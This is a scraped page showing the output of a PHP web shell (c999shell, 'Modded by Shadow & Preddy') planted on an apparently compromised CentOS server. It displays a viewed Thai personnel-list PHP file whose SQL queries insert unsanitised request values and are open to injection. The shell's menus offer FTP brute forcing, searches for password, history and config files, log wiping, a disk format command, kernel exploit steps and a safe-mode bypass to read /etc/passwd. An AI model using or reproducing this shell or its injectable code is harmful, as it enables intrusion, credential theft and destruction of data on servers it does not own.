Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/develop_person_depart/   drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.17%)
                            Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    

Viewing file:     AbsentPersonalList.php (15.74 KB)      -rw-r--r--

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../include/Function.php" );
		
		/**  Chart  */
		include ("../includes/charts.php");
		
		/**  Create Database Object  */
		$dbObj = new DBConn;

	
		/**  Config Table for This Page  */
		$myTable = "personal_tb";
		$myTableFK = "Teacher_id";
		$myOrderBy = "Teacher_id,Teacher_name";
		
			$params = "StatusId=1";
		
		
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
			
		/**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 10; }
		
		
	} # else
 ?>













  

    

    

     execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		//###  Search
		if( $keyword != "" ) { 
			if( isset($_GET['OrderBy']) ) {
				$query = "SELECT * FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE  StatusId='1' AND (Teacher_id LIKE '%$keyword%' OR Teacher_name LIKE '%$keyword%' OR Teacher_lastname LIKE '%$keyword%' ) ORDER BY $OrderBy $ASCDESC ";
			} 
			elseif( !isset($_GET['OrderBy']) ) {
				$query = "SELECT * FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE  StatusId='1' AND (Teacher_id LIKE '%$keyword%' OR Teacher_name LIKE '%$keyword%' OR Teacher_lastname LIKE '%$keyword%' ) ORDER BY $myTableFK ASC";
			}
		}
		else {
			if(isset($_GET['OrderBy'])){
				$query = "SELECT * FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE StatusId='1' ORDER BY $OrderBy $ASCDESC";
			} 
			elseif(!isset($_GET['OrderBy'])) {
				$query = "SELECT * FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE StatusId='1' ORDER BY $myTableFK ASC";
			}
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
    

     

      

      

        

      
      

        
Л№йТЛЕСЎ » ўйНБЩЕєШ¤ЕТЎГ » ўйНБЩЕ»ГРЗСµФЎТГґУГ§µУбЛ№и§
        
      

        
 
      
      

        

      	

          

            
·Сй§ЛБґ:  ГТВЎТГ
            
ЁУ№З№ўйНБЩЕµиНЛ№йТ
          
            >10
            >20
            >50
            >100
             100 ) { ?>
            >200
            
             200 ) { ?>
            >500
            
             500 ) { ?>
            >1000
            
          
          
        
      	

      	  

      	    
Keyword:
      	      " />
      	      
      	    
 
    	    
      	  

      	    

    	    
    	  

   0 ) { ?>
  fetchArray($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
				
				$Teacher_code = $rs['Teacher_code'];

				if( $keyword != "" ) {
					$Teacher_name = eregi_replace( $keyword, "\\0", $rs["Teacher_name"]);
					$Teacher_lastname = eregi_replace( $keyword, "\\0", $rs["Teacher_lastname"]);
					$Teacher_id = eregi_replace( $keyword, "\\0", $rs["Teacher_id"]);
				}
				else {
					$Teacher_name = $rs["Teacher_name"];
					$Teacher_lastname = $rs["Teacher_lastname"];
					$Teacher_id = $rs["Teacher_id"];
				
				
				/**  ЁУ№З№ГРаєХВ№  */
				$sql = " SELECT *  FROM history_position_tb  WHERE Teacher_code='$Teacher_code' " ;
				$result3 = $dbObj->execQuery($sql);
				$countnum = $dbObj->_numrows;
				$dbObj->freeresult($result3);
				$sum += $countnum;
          }
          ?>
            

    

      
No
      

        
        
        
        
        ЄЧиН-№ТБКЎШЕ
      

        
        
        
        
        µУбЛ№и§ГТЄЎТГ
      
ЁУ№З№ЗС№
КРКБ
      
Actions
      
            

              

              

              
 
                
              
              
execQuery($query3);
		      $rs3 = $dbObj->fetchObject($result3);
			 // echo  "$rs3->Budget_year" ;
			  $query2 = " SELECT *  FROM history_accumu  Where   Teacher_code='$rs[Teacher_code]'  and   Year='$rs3->Budget_year'   ";
		      $result2 = $dbObj->execQuery($query2);
		       $rss2 = $dbObj->fetchObject($result2);
			    echo "$rss2->Times_total "  ;
			    
		    	  ?>
              

                

                  
&Absent_code=3','AddHisAbsent','500','250','yes');">
                  

                
              
                
              
            
          
      
            
        
          

            

          

           0 ) { ?>
          

            

                

            
            

                
Л№йТ: 
                     1) {	
                            $previous = $display - 1;					

                    ?>
bool(false)


:: Command execute ::
Enter:  
Select: 
-----------------------------------------------------------find all suid filesfind suid files in current dirfind all sgid filesfind sgid files in current dirfind config.inc.php filesfind config* filesfind config* files in current dirfind all writable folders and filesfind all writable folders and files in current dirfind all service.pwd filesfind service.pwd files in current dirfind all .htpasswd filesfind .htpasswd files in current dirfind all .bash_history filesfind .bash_history files in current dirfind all .fetchmailrc filesfind .fetchmailrc files in current dirlist file attributes on a Linux second extended file systemshow opened ports 



:: Shadow's tricks :D  ::

  

    
Useful Commands 
    
    

      

        
        
          
            Kernel version
              Logged in users
                Last to connect
                  Suid bins
                    USER WITHOUT PASSWORD!
                    Write in /etc/?
                    Downloaders?
                    CPUINFO
                    Open ports
                    gcc installed?
					Format box (DANGEROUS)
                    WIPELOGS PT1 (If wget installed)
                    WIPELOGS PT2
                    WIPELOGS PT3
                    Kernel attack (Krad.c) PT1 (If wget installed)
                    Kernel attack (Krad.c) PT2 (L1)
                    Kernel attack (Krad.c) PT2 (L2)
                    Kernel attack (Krad.c) PT2 (L3)
                    Kernel attack (Krad.c) PT2 (L4)
                    Kernel attack (Krad.c) PT2 (L5)
                  
        
         
        
          

        Warning. Kernel may be alerted using higher levels 
    
    
  

   Kernel Info: 

      
      
	  
	  
	  
	  
    
    



:: Preddy's tricks :D  ::

  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      
    
    
  

   Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    
    




 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]



:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--